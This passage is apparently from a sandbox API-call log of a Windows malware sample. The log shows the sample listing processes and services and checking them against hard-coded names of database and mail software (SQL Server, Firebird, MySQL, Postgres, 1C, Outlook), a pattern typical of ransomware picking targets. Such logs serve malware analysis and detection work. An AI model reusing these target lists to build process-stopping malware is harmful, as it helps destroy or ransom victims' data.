dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0254.458] lstrlenW (lpString="taskhost.exe") returned 12 [0254.458] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.458] lstrlenW (lpString="svchost.exe") returned 11 [0254.458] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0254.458] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0254.458] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0254.458] lstrlenW (lpString="reader_sl.exe") returned 13 [0254.458] Process32NextW (in: hSnapshot=0x37c, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0254.459] CloseHandle (hObject=0x37c) returned 1 [0254.459] Sleep (dwMilliseconds=0x1f4) [0255.383] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea380 [0255.383] EnumServicesStatusExW (in: hSCManager=0x47ea380, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0255.383] GetLastError () returned 0xea [0255.383] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xcec) returned 0x3dec5a0 [0255.383] EnumServicesStatusExW (in: hSCManager=0x47ea380, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xcec, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0255.384] CloseServiceHandle (hSCObject=0x47ea380) returned 1 [0255.384] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0255.384] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0255.384] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0255.384] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0255.384] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0255.384] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0255.384] lstrlenW (lpString="AudioSrv") returned 8 [0255.384] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0255.384] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0255.384] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0255.384] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0255.384] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0255.384] lstrlenW (lpString="BFE") returned 3 [0255.384] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0255.384] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0255.384] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0255.384] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0255.384] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0255.384] lstrlenW (lpString="CryptSvc") returned 8 [0255.384] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0255.384] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0255.384] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0255.384] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0255.384] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0255.384] lstrlenW (lpString="CscService") returned 10 [0255.384] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0255.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0255.385] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0255.385] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0255.385] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0255.385] lstrlenW (lpString="DcomLaunch") returned 10 [0255.385] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0255.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0255.385] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0255.385] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0255.385] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0255.385] lstrlenW (lpString="Dhcp") returned 4 [0255.385] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0255.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0255.385] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0255.385] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0255.385] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0255.385] lstrlenW (lpString="Dnscache") returned 8 [0255.385] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0255.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0255.385] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0255.385] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0255.385] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0255.385] lstrlenW (lpString="DPS") returned 3 [0255.385] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0255.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0255.385] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0255.385] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0255.385] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0255.385] lstrlenW (lpString="eventlog") returned 8 [0255.385] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0255.385] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0255.385] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0255.385] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0255.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0255.386] lstrlenW (lpString="EventSystem") returned 11 [0255.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0255.386] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0255.386] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0255.386] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0255.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0255.386] lstrlenW (lpString="gpsvc") returned 5 [0255.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0255.386] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0255.386] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0255.386] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0255.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0255.386] lstrlenW (lpString="LanmanWorkstation") returned 17 [0255.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0255.386] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0255.386] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0255.386] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0255.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0255.386] lstrlenW (lpString="lmhosts") returned 7 [0255.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0255.386] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0255.386] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0255.386] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0255.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0255.386] lstrlenW (lpString="MMCSS") returned 5 [0255.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0255.386] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0255.386] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0255.386] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0255.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0255.386] lstrlenW (lpString="MpsSvc") returned 6 [0255.386] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0255.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0255.387] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0255.387] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0255.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0255.387] lstrlenW (lpString="NlaSvc") returned 6 [0255.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0255.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0255.387] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0255.387] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0255.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0255.387] lstrlenW (lpString="nsi") returned 3 [0255.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0255.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0255.387] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0255.387] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0255.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0255.387] lstrlenW (lpString="PcaSvc") returned 6 [0255.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0255.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0255.387] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0255.387] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0255.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0255.387] lstrlenW (lpString="PlugPlay") returned 8 [0255.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0255.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0255.387] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0255.387] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0255.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0255.387] lstrlenW (lpString="Power") returned 5 [0255.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0255.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0255.387] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0255.388] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0255.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0255.388] lstrlenW (lpString="ProfSvc") returned 7 [0255.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0255.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0255.388] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0255.388] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0255.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0255.388] lstrlenW (lpString="RpcEptMapper") returned 12 [0255.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0255.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0255.388] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0255.388] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0255.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0255.388] lstrlenW (lpString="RpcSs") returned 5 [0255.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0255.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0255.388] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0255.388] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0255.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0255.388] lstrlenW (lpString="SamSs") returned 5 [0255.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0255.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0255.388] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0255.388] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0255.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0255.388] lstrlenW (lpString="Schedule") returned 8 [0255.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0255.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0255.389] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0255.389] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0255.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0255.389] lstrlenW (lpString="SENS") returned 4 [0255.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0255.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0255.389] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0255.389] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0255.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0255.389] lstrlenW (lpString="ShellHWDetection") returned 16 [0255.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0255.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0255.389] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0255.389] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0255.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0255.389] lstrlenW (lpString="Spooler") returned 7 [0255.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0255.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0255.389] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0255.389] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0255.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0255.389] lstrlenW (lpString="SysMain") returned 7 [0255.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0255.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0255.389] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0255.389] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0255.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0255.389] lstrlenW (lpString="Themes") returned 6 [0255.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0255.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0255.389] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0255.389] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0255.390] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0255.390] lstrlenW (lpString="UxSms") returned 5 [0255.390] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0255.390] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0255.390] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0255.390] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0255.390] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0255.390] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0255.390] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240 [0255.391] Process32FirstW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.391] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0255.391] lstrlenW (lpString="System") returned 6 [0255.391] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0255.391] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0255.391] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0255.391] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0255.391] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0255.391] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0255.391] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0255.391] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0255.392] lstrlenW (lpString="smss.exe") returned 8 [0255.392] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0255.392] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0255.392] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0255.392] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0255.392] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0255.392] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0255.392] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0255.392] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.392] lstrlenW (lpString="csrss.exe") returned 9 [0255.392] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0255.392] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0255.392] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0255.392] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0255.392] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0255.392] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0255.392] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0255.392] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0255.393] lstrlenW (lpString="wininit.exe") returned 11 [0255.393] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0255.393] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0255.393] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0255.393] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0255.393] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0255.393] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0255.393] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0255.393] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.393] lstrlenW (lpString="csrss.exe") returned 9 [0255.393] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0255.393] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0255.393] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0255.393] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0255.393] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0255.393] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0255.393] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0255.393] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0255.393] lstrlenW (lpString="winlogon.exe") returned 12 [0255.394] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0255.394] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0255.394] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0255.394] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0255.394] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0255.394] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0255.394] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0255.394] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0255.394] lstrlenW (lpString="services.exe") returned 12 [0255.394] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0255.394] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0255.394] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0255.394] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0255.394] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0255.394] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0255.394] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0255.394] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0255.394] lstrlenW (lpString="lsass.exe") returned 9 [0255.394] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0255.395] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0255.395] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0255.395] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0255.395] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0255.395] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0255.395] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0255.395] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0255.395] lstrlenW (lpString="lsm.exe") returned 7 [0255.395] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0255.395] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0255.395] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0255.395] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0255.395] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0255.395] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0255.395] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0255.395] Process32NextW (in: hSnapshot=0x240, 